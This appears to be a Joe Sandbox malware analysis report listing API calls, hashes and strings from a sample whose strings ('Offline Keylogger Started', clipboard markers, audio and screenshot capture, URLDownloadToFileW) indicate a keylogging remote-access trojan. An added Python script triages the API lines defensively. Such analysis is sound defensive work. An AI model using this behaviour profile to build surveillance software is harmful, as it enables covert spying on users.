• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
• GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
• Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
• Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
• Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,274C1D66,00000000,00000000,?,274C5C88,274C1D66,00000000,00000000,00000000,?,274C5E85,00000006,FlsSetValue), ref: 274C5D13
• GetLastError.KERNEL32(?,274C5C88,274C1D66,00000000,00000000,00000000,?,274C5E85,00000006,FlsSetValue,274CE190,FlsSetValue,00000000,00000364,?,274C5BC8), ref: 274C5D1F
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,274C5C88,274C1D66,00000000,00000000,00000000,?,274C5E85,00000006,FlsSetValue,274CE190,FlsSetValue,00000000), ref: 274C5D2D
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 79ea7f0ac1a77eb270addc01f936d4a24e4175c76bdd9d0c7bb23a2b29937300
• Instruction ID: d7300e501b40e3e4aecc2fd0fa1cdd1fdc0b80d05d163ba6beeab750324ee049
• Opcode Fuzzy Hash: 79ea7f0ac1a77eb270addc01f936d4a24e4175c76bdd9d0c7bb23a2b29937300
• Instruction Fuzzy Hash: E401F039611332EBD311CA6A9C4DE8AB798AF456A5B20462CF539D7244DB28D441CAD0
Uniqueness
Uniqueness Score: -1.00%
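
The "APIs" lines in this listing are the part an analyst actually reads: the Sleep/GetForegroundWindow/GetWindowTextW function at 0040A573 and the LoadLibraryExW/GetLastError/LoadLibraryExW wrapper at 00448598 (repeated at 274C5D13 in the second dump). The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses that line format into records and applies a few triage rules of my own, decoding Sleep delays, flagging LoadLibraryExW with dwFlags 0x800 (the Windows SDK value of LOAD_LIBRARY_SEARCH_SYSTEM32), tagging the GetForegroundWindow + GetWindowTextW pair as active-window title capture, and recognising the LoadLibraryExW, GetLastError, LoadLibraryExW retry that passes FlsSetValue as the MSVC runtime's own thunk loader rather than sample-specific logic. The sample lines are copied from this report; the function names, the rule set and the wording of the notes are assumptions of this example.

```python
"""Parse Joe Sandbox 'APIs' reference lines and apply triage heuristics.

Added example; not Joe Sandbox code. The sample lines are copied from this
report, the classification rules are this example's own.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Copied from the report: the window-title function, the CRT loader wrapper
# and one no-argument LIBVCRUNTIME reference (constructed sample input).
SAMPLE_APIS = """\
  • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
  • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
  • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
• Sleep.KERNEL32(000001F4), ref: 0040A573
• Sleep.KERNEL32(00000064), ref: 0040A5FD
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
• GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
• ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
"""

# "• [Part of subcall function XXXX: ]Api.MODULE[(args)], ref: XXXX"
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x00000800      # LoadLibraryExW dwFlags, Windows SDK value
CRT_LOADER_PATTERN = ["LoadLibraryExW", "GetLastError", "LoadLibraryExW"]


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[Union[int, str, None]]   # int for hex, None for '?', str for symbols
    ref: int                            # address of the call site
    subcall_of: Optional[int] = None    # set when the line is "Part of subcall function"


def parse_arg(tok: str) -> Union[int, str, None]:
    tok = tok.strip()
    if tok == "?":
        return None                     # argument not recovered by the sandbox
    try:
        return int(tok, 16)
    except ValueError:
        return tok                      # symbolic argument such as FlsSetValue


def parse_api_lines(text: str) -> List[ApiRef]:
    refs: List[ApiRef] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                    # headers such as "APIs"/"Strings" are skipped
        args = m.group("args")
        refs.append(ApiRef(
            api=m.group("api"),
            module=m.group("mod"),
            args=[parse_arg(t) for t in args.split(",")] if args else [],
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return refs


def triage(refs: List[ApiRef]) -> List[str]:
    """Heuristic notes over the parsed references (rules are this example's own)."""
    notes: List[str] = []
    for r in refs:
        # Sleep(dwMilliseconds): the single hex argument is the delay in ms.
        if r.api == "Sleep" and r.args and isinstance(r.args[0], int):
            notes.append(f"{r.ref:08X}: Sleep({r.args[0]} ms)")
        # LoadLibraryExW(lpLibFileName, hFile, dwFlags): third argument is dwFlags.
        if (r.api == "LoadLibraryExW" and len(r.args) >= 3
                and r.args[2] == LOAD_LIBRARY_SEARCH_SYSTEM32):
            notes.append(f"{r.ref:08X}: LoadLibraryExW(dwFlags=LOAD_LIBRARY_SEARCH_SYSTEM32)")
    names = {r.api for r in refs}
    if {"GetForegroundWindow", "GetWindowTextW"} <= names:
        notes.append("active-window title capture: GetForegroundWindow + GetWindowTextW "
                     "(the usual way a keylogger tags keystrokes with the window they came from)")
    order = [r.api for r in refs]
    width = len(CRT_LOADER_PATTERN)
    for i in range(len(order) - width + 1):
        # System32-only load, check the error, retry without the flag, looking up FlsSetValue:
        # the MSVC runtime's thunk loader for older Windows, not sample-specific logic.
        if order[i:i + width] == CRT_LOADER_PATTERN and "FlsSetValue" in refs[i].args:
            notes.append(f"{refs[i].ref:08X}: LoadLibraryExW/GetLastError/LoadLibraryExW retry "
                         "with FlsSetValue argument: MSVC runtime thunk loader, low priority")
    return notes


if __name__ == "__main__":
    for note in triage(parse_api_lines(SAMPLE_APIS)):
        print(note)
```

Feeding the script a whole report section works the same way, because lines that are not API references (headers, hashes, dump paths) simply do not match LINE_RE; the useful output is the handful of notes that separate runtime boilerplate such as the CRT loader from behaviour worth following up, like the 500 ms/100 ms polling loop around the window-title capture.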

APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
  • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
• _UnwindNestedFrames.LIBCMT ref: 00439891
• ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
• CallCatchBlock.LIBVCRUNTIME ref: 004398C7
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2633735394-0
                                                                                                                                                                    • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                    • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                                                                                                                                                    • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                    • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                                                                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                                                                                                                                                    • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                                                                                                                                                    • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4116985748-0
                                                                                                                                                                    • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                                    • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                                                                                                                                                    • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                                    • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                                                                                                                                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                                                                                                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                                                                                                                                                      • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                                                                                                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1761009282-0
                                                                                                                                                                    • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                                    • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                                                                                                                                                    • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                                    • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                                                                    • String ID: pow
                                                                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                                                                    • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                                                                                                                                    • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                                                                                                                                                    • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                                                                                                                                    • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE
                                                                                                                                                                      • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                                                                                                                                    • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                                                                                                                                                      • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                                                                                                                                      • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                    • String ID: image/jpeg
                                                                                                                                                                    • API String ID: 1291196975-3785015651
                                                                                                                                                                    • Opcode ID: d9a19672ec4dc75711255ce94c2c2311e4e29857de9186f34d814f6d2a4cbe43
                                                                                                                                                                    • Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
                                                                                                                                                                    • Opcode Fuzzy Hash: d9a19672ec4dc75711255ce94c2c2311e4e29857de9186f34d814f6d2a4cbe43
                                                                                                                                                                    • Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 0040B797
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Init_thread_footer__onexit
                                                                                                                                                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                                                    • API String ID: 1881088180-3686566968
                                                                                                                                                                    • Opcode ID: 9aa95a32f3afd18c73a55cc462cca412e73d5fbf7f0315d28edabe158aabcb31
                                                                                                                                                                    • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                                                                                                                                                    • Opcode Fuzzy Hash: 9aa95a32f3afd18c73a55cc462cca412e73d5fbf7f0315d28edabe158aabcb31
                                                                                                                                                                    • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002), ref: 00451C12
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                    • API String ID: 0-711371036
Uniqueness
Uniqueness Score: -1.00%

APIs
• SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA
  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
• SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF
  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Stream$GdipImage$Create$DisposeFromLoadSave
• String ID: image/png
• API String ID: 1291196975-2966254431
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
• GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 0040501F
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 481472006-1507639952
Uniqueness
Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32 ref: 00416640
• URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: DownloadFileSleep
• String ID: !D@
• API String ID: 1931167962-604454484
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: _strlen
• String ID: : $Se.
• API String ID: 4218353326-4089948878
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLocalTime.KERNEL32(00000000), ref: 0041B509
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: | $%02i:%02i:%02i:%03i
• API String ID: 481472006-2430845779
Uniqueness
Uniqueness Score: -1.00%

APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: alarm.wav$hYG
• API String ID: 1174141254-2782910960
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
• CloseHandle.KERNEL32(?), ref: 0040B0B4
• UnhookWindowsHookEx.USER32 ref: 0040B0C7
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
                                                                                                                                                                    • Opcode ID: d2165033513dcf71b3ac2fd0adae2b36f4a3385a09ded61426f46b30c38066df
                                                                                                                                                                    • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                                                                                                                                                    • Opcode Fuzzy Hash: d2165033513dcf71b3ac2fd0adae2b36f4a3385a09ded61426f46b30c38066df
                                                                                                                                                                    • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 274C2903
                                                                                                                                                                      • Part of subcall function 274C35D2: RaiseException.KERNEL32(?,?,?,274C2925,00000000,00000000,00000000,?,?,?,?,?,274C2925,?,274D21B8), ref: 274C3632
                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 274C2920
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                    • String ID: Unknown exception
                                                                                                                                                                    • API String ID: 3476068407-410509341
                                                                                                                                                                    • Opcode ID: 2add6f9d9f888f405db76ea3f27695fb5af27b46539ce7190e2595827eb38502
                                                                                                                                                                    • Instruction ID: 832a9c0bb258b146dd16437e303a9c21c714480f0ad2ac5eca843908b5eefb0e
                                                                                                                                                                    • Opcode Fuzzy Hash: 2add6f9d9f888f405db76ea3f27695fb5af27b46539ce7190e2595827eb38502
                                                                                                                                                                    • Instruction Fuzzy Hash: C3F0283CA0020CB78B01E6A8ED449DF776C5F51E50F90467CEE14D2190EFB0EA16C5D2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • waveInPrepareHeader.WINMM(2413D270,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                                                                                                                                    • waveInAddBuffer.WINMM(2413D270,00000020,?,00000000,00401A15), ref: 0040185F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                    • String ID: XMG
                                                                                                                                                                    • API String ID: 2315374483-813777761
                                                                                                                                                                    • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
